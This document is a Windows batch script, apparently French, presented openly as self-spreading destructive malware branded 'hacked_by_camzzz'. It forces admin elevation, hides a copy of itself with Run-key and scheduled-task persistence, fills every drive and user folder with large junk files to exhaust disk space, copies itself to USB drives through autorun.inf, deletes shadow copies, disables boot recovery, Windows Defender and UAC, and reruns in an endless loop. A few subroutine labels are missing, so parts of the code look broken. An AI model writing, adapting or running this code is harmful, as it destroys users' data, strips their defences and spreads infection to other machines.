@echo off
title CAMZZZ_SIGNED_FLOOD - PAR CAMZZZ
color 4F
echo Deploiement du chaos signe "hacked_by_camzzz"...
echo.

net session >nul 2>&1
if %errorlevel% neq 0 (
    powershell start -verb runas '%0'
    exit
)

set "SELF=%~f0"
set "HIDDEN_DIR=%APPDATA%\Microsoft\Windows\Caches\hacked_by_camzzz"
set "HIDDEN_COPY=%HIDDEN_DIR%\hacked_by_camzzz_winlogon.bat"
mkdir "%HIDDEN_DIR%" 2>nul
copy "%SELF%" "%HIDDEN_COPY%" /Y >nul
attrib +h +s "%HIDDEN_DIR%" /S /D >nul

reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "hacked_by_camzzz" /t REG_SZ /d "%HIDDEN_COPY%" /f >nul
reg add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "hacked_by_camzzz" /t REG_SZ /d "%HIDDEN_COPY%" /f >nul
schtasks /create /tn "hacked_by_camzzz_task" /tr "%HIDDEN_COPY%" /sc minute /mo 30 /f >nul 2>&1

setlocal enabledelayedexpansion

set "FILEPATH=%~1"
(
echo hacked_by_camzzz - INFECTED BY CAMZZZ FLOOD ENGINE
echo ==================================================
for /l %%i in (1,1,100) do echo [hacked_by_camzzz] This file was generated by the CAMZZZ flood engine - line %%i
echo ==================================================
echo hacked_by_camzzz - SYSTEM COMPROMISED PERMANENTLY
) > "%FILEPATH%"
:: Ajoute des données binaires pour alourdir (signature en hex)
for /l %%s in (1,1,50) do (
    echo hacked_by_camzzz_signature_block_%%s >> "%FILEPATH%"
)
goto :eof

set "FILEPATH=%~1"
set /a SIZE_MB=5 + !RANDOM! %% 20
set /a SIZE_BYTES=!SIZE_MB! * 1048576
fsutil file createnew "!FILEPATH!" !SIZE_BYTES! >nul 2>&1
powershell -Command "$file = '%FILEPATH%'; $bytes = [System.Text.Encoding]::ASCII.GetBytes('hacked_by_camzzz' + [string]::Join('', (1..200 | ForEach-Object { '_SIGNATURE_' }))); $fs = [System.IO.File]::OpenWrite($file); $fs.Write($bytes, 0, $bytes.Length); $fs.Close()" >nul 2>&1
goto :eof

:flood_folder
set "TARGET=%~1"
set "DEPTH=%~2"
if not exist "!TARGET!" mkdir "!TARGET!" 2>nul
if "!DEPTH!"=="4" goto :eof

for /l %%f in (1,1,150) do (
    set "RAND_SUFFIX=!RANDOM!"
    set "FILENAME_TXT=hacked_by_camzzz_!RAND_SUFFIX!.txt"
    set "FILENAME_BIN=hacked_by_camzzz_!RAND_SUFFIX!.bin"
    set "FILENAME_DAT=hacked_by_camzzz_!RAND_SUFFIX!.dat"
    set "FILENAME_LOG=hacked_by_camzzz_!RAND_SUFFIX!.log"
    
    set "FULLPATH_TXT=!TARGET!\!FILENAME_TXT!"
    set "FULLPATH_BIN=!TARGET!\!FILENAME_BIN!"
    set "FULLPATH_DAT=!TARGET!\!FILENAME_DAT!"
    
    :: Fichier texte avec contenu signé
    call :create_signed_file "!FULLPATH_TXT!"
    :: Fichiers binaires lourds avec signature en tête
    call :create_signed_binary "!FULLPATH_BIN!"
    fsutil file createnew "!FULLPATH_DAT!" 5242880 >nul 2>&1
    :: Signe aussi le .dat
    echo hacked_by_camzzz >> "!FULLPATH_DAT!"
)

for /l %%d in (1,1,12) do (
    set "SUBDIR_NAME=hacked_by_camzzz_subdir_!RANDOM!"
    set "SUBDIR=!TARGET!\!SUBDIR_NAME!"
    mkdir "!SUBDIR!" 2>nul
    attrib +h "!SUBDIR!" >nul
    :: Crée un fichier README dans chaque sous-dossier
    echo hacked_by_camzzz - THIS FOLDER IS INFECTED > "!SUBDIR!\hacked_by_camzzz_README.txt"
    set /a NEW_DEPTH=!DEPTH!+1
    call :flood_folder "!SUBDIR!" !NEW_DEPTH!
)
goto :eof

:start_apocalypse
for %%D in (C D E F G H I J K L M N O P Q R S T U V W X Y Z) do (
    if exist %%D:\ (
        set "ROOT_DIR=%%D:\hacked_by_camzzz_ROOT"
        mkdir "!ROOT_DIR!" 2>nul
        call :flood_folder "!ROOT_DIR!" 0
        call :flood_folder "%%D:\hacked_by_camzzz_system" 0
    )
)

for %%U in (
    "%USERPROFILE%\Desktop\hacked_by_camzzz"
    "%USERPROFILE%\Downloads\hacked_by_camzzz"
    "%USERPROFILE%\Documents\hacked_by_camzzz"
    "%USERPROFILE%\Music\hacked_by_camzzz"
    "%USERPROFILE%\Videos\hacked_by_camzzz"
    "%USERPROFILE%\Pictures\hacked_by_camzzz"
    "%APPDATA%\hacked_by_camzzz"
    "%TEMP%\hacked_by_camzzz"
    "%WINDIR%\Temp\hacked_by_camzzz"
) do (
    mkdir "%%~U" 2>nul
    call :flood_folder "%%~U" 0
)

call :flood_folder "C:\ProgramData\hacked_by_camzzz" 0
call :flood_folder "C:\Program Files\hacked_by_camzzz" 0
call :flood_folder "C:\Program Files (x86)\hacked_by_camzzz" 0
call :flood_folder "C:\Windows\Temp\hacked_by_camzzz" 0
goto :eof

:usb_replication
for %%D in (D E F G H I J K L M N O P Q R S T U V W X Y Z) do (
    if exist %%D:\ (
        if not exist "%%D:\hacked_by_camzzz_USB_infected.txt" (
            mkdir "%%D:\hacked_by_camzzz_USB_ROOT" 2>nul
            copy "%HIDDEN_COPY%" "%%D:\hacked_by_camzzz_USB_ROOT\hacked_by_camzzz_autorun.bat" /Y >nul
            attrib +h +s "%%D:\hacked_by_camzzz_USB_ROOT" >nul
            echo [AutoRun] > "%%D:\autorun.inf"
            echo open=hacked_by_camzzz_USB_ROOT\hacked_by_camzzz_autorun.bat >> "%%D:\autorun.inf"
            echo label=hacked_by_camzzz >> "%%D:\autorun.inf"
            attrib +h +s "%%D:\autorun.inf" >nul
            echo INFECTED_BY_CAMZZZ > "%%D:\hacked_by_camzzz_USB_infected.txt"
            call :flood_folder "%%D:\hacked_by_camzzz_USB_ROOT" 0
        )
    )
)
ping 127.0.0.1 -n 30 >nul
goto usb_replication

vssadmin delete shadows /all /quiet >nul 2>&1
bcdedit /set {default} recoveryenabled No >nul 2>&1
bcdedit /set {default} bootstatuspolicy ignoreallfailures >nul 2>&1
reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender" /v DisableAntiSpyware /t REG_DWORD /d 1 /f >nul 2>&1
reg add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v EnableLUA /t REG_DWORD /d 0 /f >nul 2>&1

start /min "" cmd /c "%~f0" usb

call :start_apocalypse

:main_loop
timeout /t 300 /nobreak >nul
for /f "tokens=3" %%a in ('dir C:\ 2^>nul ^| find "octets de disque libre"') do set FREE=%%a
set FREE=%FREE:,=%
if %FREE% GTR 104857600 (
    call :start_apocalypse
)
echo hacked_by_camzzz - ACTIVE INFECTION - %date% %time% > "%USERPROFILE%\Desktop\hacked_by_camzzz_STATUS.txt"
goto main_loop
